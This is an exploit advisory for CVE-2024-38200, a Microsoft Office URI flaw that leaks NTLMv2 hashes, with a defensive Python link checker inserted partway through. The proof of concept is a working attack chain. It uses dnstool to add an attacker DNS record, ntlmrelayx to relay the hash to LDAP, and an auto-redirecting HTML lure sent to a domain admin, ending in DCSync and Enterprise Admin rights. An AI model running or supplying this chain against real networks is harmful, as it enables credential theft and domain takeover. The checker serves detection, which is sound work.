Microsoft Office NTLMv2 Disclosure

Microsoft Office 2019 MSO build 1808 (16.0.10411.20011) and Microsoft 365 MSO version 2403 build 16.0.17425.20176 suffer from an NTLMv2 hash disclosure vulnerability.

Packet Storm

Exploit Title: Microsoft Office NTLMv2 Disclosure Vulnerability

Exploit Author: Metin Yunus Kandemir

Vendor Homepage: https://www.office.com/

Software Link: https://www.office.com/

Details: https://github.com/passtheticket/CVE-2024-38200

Version: Microsoft Office 2019 MSO Build 1808 (16.0.10411.20011), Microsoft 365 MSO (Version 2403 Build 16.0.17425.20176)

Tested against: Windows 11

CVE: CVE-2024-38200

Description

MS Office URI schemes allow a document to be fetched from a remote source.
The Office URI scheme format is <scheme-name>:<command-name>|<command-argument-descriptor>|<command-argument>.
Example: ms-word:ofe|u|http://hostname:port/leak.docx
When the URI "ms-word:ofe|u|http://hostname:port/leak.docx" is invoked on a victim computer, Office fetches the document from the remote host. This behaviour is abused to capture and relay the NTLMv2 hash over SMB and HTTP. For detailed information about capturing a victim user's NTLMv2 hash over SMB, see https://www.privsec.nz/releases/ms-office-uri-handlers.
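As an added defensive example (not part of this advisory or the referenced repository), the following Python checker parses the Office URI format quoted above and flags links that would make Office fetch a document from a remote host, which is the step that triggers the outbound NTLM authentication. Single-label hostnames are rated highest because, as the proof of concept below explains, Windows places them in the Intranet Zone and authenticates without prompting. The list of scheme names, the allow-list parameter and the sample HTML are constructed assumptions; only ms-word appears on the page.

```python
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Optional
from urllib.parse import urlsplit

# Office URI scheme names to recognise. Assumption: only ms-word is on the
# advisory page; the other names are added here for coverage.
OFFICE_SCHEMES = frozenset({
    "ms-word", "ms-excel", "ms-powerpoint", "ms-visio",
    "ms-access", "ms-project", "ms-publisher",
})

# href="..." / href='...' values in HTML (simple regex, enough for a gateway check).
HREF_RE = re.compile(r"""href\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


@dataclass
class OfficeUri:
    scheme: str       # e.g. ms-word
    command: str      # e.g. ofe
    descriptor: str   # e.g. u
    argument: str     # e.g. http://host/file.docx or \\host\share\file.docx


def parse_office_uri(uri: str) -> Optional[OfficeUri]:
    """Parse <scheme-name>:<command-name>|<descriptor>|<argument>.

    Returns None when the string is not an Office URI in that shape."""
    scheme, sep, rest = uri.partition(":")
    if not sep or scheme.lower() not in OFFICE_SCHEMES:
        return None
    parts = rest.split("|", 2)
    if len(parts) != 3:
        return None
    command, descriptor, argument = parts
    return OfficeUri(scheme.lower(), command, descriptor, argument)


def remote_host(argument: str) -> Optional[str]:
    """Host that Office would contact to fetch the argument, or None if none."""
    if argument.startswith("\\\\"):
        # UNC path \\host\share\file: the first component is the host (SMB).
        host = argument.lstrip("\\").split("\\", 1)[0]
        return host.lower() or None
    parts = urlsplit(argument)
    if parts.scheme.lower() in ("http", "https") and parts.hostname:
        return parts.hostname.lower()
    return None


def assess(uri: str, allowed_hosts: FrozenSet[str] = frozenset()) -> Dict[str, object]:
    """Classify one link (allowed_hosts entries are expected in lower case).

    Risk levels:
      high    - remote fetch from a single-label host (Intranet Zone, silent NTLM)
      medium  - remote fetch from any other host not on the allow list
      allowed - host explicitly allowed
      none    - Office URI with no remote host, e.g. a local path"""
    parsed = parse_office_uri(uri)
    if parsed is None:
        return {"office_uri": False}
    host = remote_host(parsed.argument)
    finding: Dict[str, object] = {"office_uri": True, "scheme": parsed.scheme,
                                  "command": parsed.command, "host": host,
                                  "risk": "none"}
    if host is None:
        return finding
    if host in allowed_hosts:
        finding["risk"] = "allowed"
    elif "." not in host:
        finding["risk"] = "high"
    else:
        finding["risk"] = "medium"
    return finding


def scan_html(html: str, allowed_hosts: FrozenSet[str] = frozenset()) -> List[Dict[str, object]]:
    """Return an assessment for every Office URI found in href attributes."""
    return [assess(u, allowed_hosts) for u in HREF_RE.findall(html)
            if parse_office_uri(u) is not None]


# Constructed sample page: one Office link in the shape used by the advisory
# plus an ordinary https link that must be ignored.
SAMPLE_HTML = """<html><body>
<a id="link" href="ms-word:ofe|u|http://attackerhost:8080/leak.docx"></a>
<a href="https://example.com/page">normal link</a>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
```

Run on its own, the script prints one finding with host attackerhost and risk high. The single-label test is deliberately the first check after the allow list, since that is the property the PoC relies on: a name that resolves inside the domain but is not on a maintained allow list is exactly what a newly added DNS record looks like.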

Proof Of Concept

If we add a DNS A record and use that name as the hostname in the Office URI, Windows treats the hostname as part of the Intranet Zone. NTLMv2 authentication therefore occurs automatically, and a standard user can escalate privileges without needing a misconfigured GPO. Any domain user with standard privileges can add a DNS record for a name that does not yet exist, so this attack works against the default settings for a domain user.

  1. Add a DNS record that resolves the hostname to the attacker IP address running ntlmrelayx. It takes approximately 5 minutes for the created record to start resolving.
    $ python dnstool.py -u 'unsafe.local\testuser' -p 'pass' -r 'attackerhost' --action 'add' --data [attacker-host-IP] [DC-IP] --zone unsafe.local

  2. Start ntlmrelayx with the following command:
    $ python ntlmrelayx.py -t ldap://DC-IP-ADDRESS --escalate-user testuser --http-port 8080

  3. Serve the following HTML file with an Apache server. Replace hostname with the added record (e.g. attackerhost).

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Microsoft Office</title>
</head>
<body>
<a id="link" href="ms-word:ofe|u|http://hostname:port/leak.docx"></a>

<script>
    function navigateToLink() {
        var link = document.getElementById('link');
        if (link) {
            var url = link.getAttribute('href');
            window.location.href = url;
        }
    }
    window.onload = navigateToLink;
</script>

</body>
</html>

  4. Send the URL of the above HTML file to a user with domain admin privileges. Check that the DNS record resolves with the ping command before sending the URL. When the victim user navigates to the URL, clicking the 'Open' button is enough to capture the NTLMv2 hash. (no warning!)

  5. The NTLMv2 hash captured over HTTP is relayed to the Domain Controller by ntlmrelayx. As a result, a standard user can obtain DCSync and Enterprise Admins permissions under the default configuration with just two clicks.
